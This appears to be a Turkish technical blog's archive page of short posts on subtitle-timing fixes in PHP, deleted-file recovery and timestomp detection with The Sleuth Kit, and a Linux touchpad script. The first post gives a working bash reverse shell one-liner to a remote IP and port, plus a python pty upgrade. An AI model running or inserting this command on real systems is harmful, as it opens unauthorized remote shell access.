Ana içeriğe atla

Kayıtlar

Kasım, 2015 tarihine ait yayınlar gösteriliyor

Bash Reverse Shell ile Terminal Almak

Bash ile reverse shell almak için aşağıdaki komut kulanılabilir. Bu komut 10.0.0.100 IP adresinin 8080 portuna bağlantı sağlayacak ve bash kabuğunun kullanılmasına izin verecektir.

/bin/bash -c '/bin/bash -i >& /dev/tcp/10.0.0.100/8080 0>&1' > /dev/null
Elde edilen bu komut satırı gerçek bir terminal gibi davranmadığından interafktif işlemlerde aşağıdaki gibi "Pseudo-terminal will not be allocated because stdin is not a terminal." hatası verecekir.

gondor ~ # ssh root@192.168.100.100 ssh root@192.168.100.100 Pseudo-terminal will not be allocated because stdin is not a terminal.
Bu durumda python pty.spawn ile gerçek bir terminal başlatmayı deneyebiliriz. Bunun için aşağıdaki gibi bir komut vermek yeterli olacaktır.

/usr/bin/python -c 'import pty; pty.spawn("/bin/bash")'

PHP ile Altyazı Dosyalarını Düzenlemek ve Senkron Kaymasını Çözmek

Altyazılı film izlerken en çok can sıkan meselelerden birisi altyazıda senkron kayması olması ve altyazıların konuşmalardan farklı zamanlarda gelmesidir. Bu sorun video oynatıcı üzerinden ayarlama yapılarak giderilebilir ancak bazen bu mümkün olmaz...

Yine böyle bir durumda altyazı ve konuşmalar arasındaki farkın yaklaşık 30 sn olduğu bir durumda altyazı dosyasını düzenleyerek tüm zamanları 30 sn kaydırmayı ve senkronu sağlamayı düşündüm. Elimdeki altyazı dosyası aşağıdaki formattaydı...

1 00:01:49,067 --> 00:01:52,064 Ne zaman karşılıklı yarışacağız? 2 00:01:54,562 --> 00:01:57,259 Gunma'daki tüm sürücüler yenildikten sonra,
Bu dosyayı okuyup zamanların üzerine 30sn ekleyecek ve çıktıyı ekrana basacak bir PHP betiği yazmaya karar verdim ve apartopar aşağıdaki kodları yazdım ve yeni altyazı dosyası oluşturdum... :)

 <?php $file="x.srt"; #Okunacak altyazı dosyası $f=file_get_contents($file); $f2=(explode("\n", $f)); foreach($f2 as $l){     $l = trim($l…

The Sleuth Kit (TSK) ile Silinen Dosyaları Kurtarmak

The Sleuth Kit (TSK) araçlarını kullanarak silinen bir dosyayı nasıl elde elebileceğimizi en yalın haliyle örneklemeye çalışalım...

Öncelikle Windows 7 üzerinde komut satırına geçip aşağıdaki gibi bir komutla onemli.txt dosyasını oluşturalım.
C:\>echo "Onemli Veriler" > onemli.txt
Dosyamızın oluştuğunu doğrulamak için type komutu ile içine bakalım ve önemli verilerimizin yerinde durduğunu görelim :)
C:\>type onemli.txt "Onemli Veriler"
Şimdi onemli.txt dosyasını kazara siliyoruz :)

C:\>del onemli.txt
Şimdi de dosyamızın silindiğini doğrulayalım...
C:\>type onemli.txt Sistem belirtilen dosyayı bulamıyor.
Hemen dir komutu verelim ve dosya listesini alalım...

C:\>dir  C sürücüsündeki birimin etiketi yok.  Birim Seri Numarası: C038-BD41  C:\ dizini 10.06.2009  23:42                24 autoexec.bat 10.06.2009  23:42                10 config.sys 14.07.2009  04:37    <DIR>          PerfLogs 13.11.2015  13:43    <DIR>          Program Files 02.1…

Timestomp ile Zaman Bilgisi Değiştirilen Dosyaların Tespit Edilmesi

Dosya ile ilgili oluşturulma, değiştirilme ve son erişim tarihlerini tutan veriler; "dosya adı" veya "MFT kayıt numarası" gibi "essentials" yani olmazsa olmaz veriler değildirler. Bu nedenle değiştirilmeleri işlevsel olarak bir sorun teşkil etmez...

Metasploit içerisinde gelen timestomp aracı ile NTFS dosya sistemi üzerindeki dosyaların zaman bilgileri değiştirilebiliyor. Bu durumda dosya özelliklerine bakıldığında dosyanın oluşturma, değiştirme ve son erişim tarihleri olması gerekenden farklı şekilde görüntüleniyor.

Dosyanın zaman bilgilerinde bir değişiklik yapılıp yapılmadığını görmek için The Sleuth Kit araçlarını kullanabiliriz...

NTFS dosya sistemi üzerinde c:\test.txt dosyası bizim kobay dosyamız. C: sürücünde dir komutunu vererek dosyaları listeleyelim...

C:\>dir  C sürücüsündeki birimin etiketi yok.  Birim Seri Numarası: C038-BD41  C:\ dizini 10.06.2009  23:42                24 autoexec.bat 10.06.2009  23:42                10 config.sys 14.07…

Linux Mint Rebecca 17.1 ve Asus N550 Touchpad Problemi

Asus N550 üzerinde Linux Mint Rebecca 17.1 kullanırken toucpadi kapatmak istediğiniz durumlarda aşağıdaki gibi betik yazabilir ve bu betiğe klavye kısayol tuşu atayarak kullanabilirsiniz.

#!/bin/bash declare -i ID ID=15 declare -i STATE STATE=`xinput list-props $ID|grep 'Device Enabled'|awk '{print $4}'` if [ $STATE -eq 1 ] then xinput disable $ID echo "Touchpad disabled." else xinput enable $ID echo "Touchpad enabled." fi Yukarıdaki betikde ID alanı devre dışı bırakılacak aygıtın ID numarasını göstermektedir. Hangi aygıtın hangi ID numarasına sahip olduğunu görmek için xinput komutunu verebilirsiniz.

harun@gondor ~ $ xinput ⎡ Virtual core pointer id=2 [master pointer (3)] ⎜ ↳ Virtual core XTEST pointer id=4 [slave pointer (2)] ⎜ ↳ Logitech USB Receiver id=10 [slave pointer (2)] ⎜ ↳ Logitech USB Receiver id=11 [slave pointer (2)] ⎜ ↳ ETPS/2 Elant…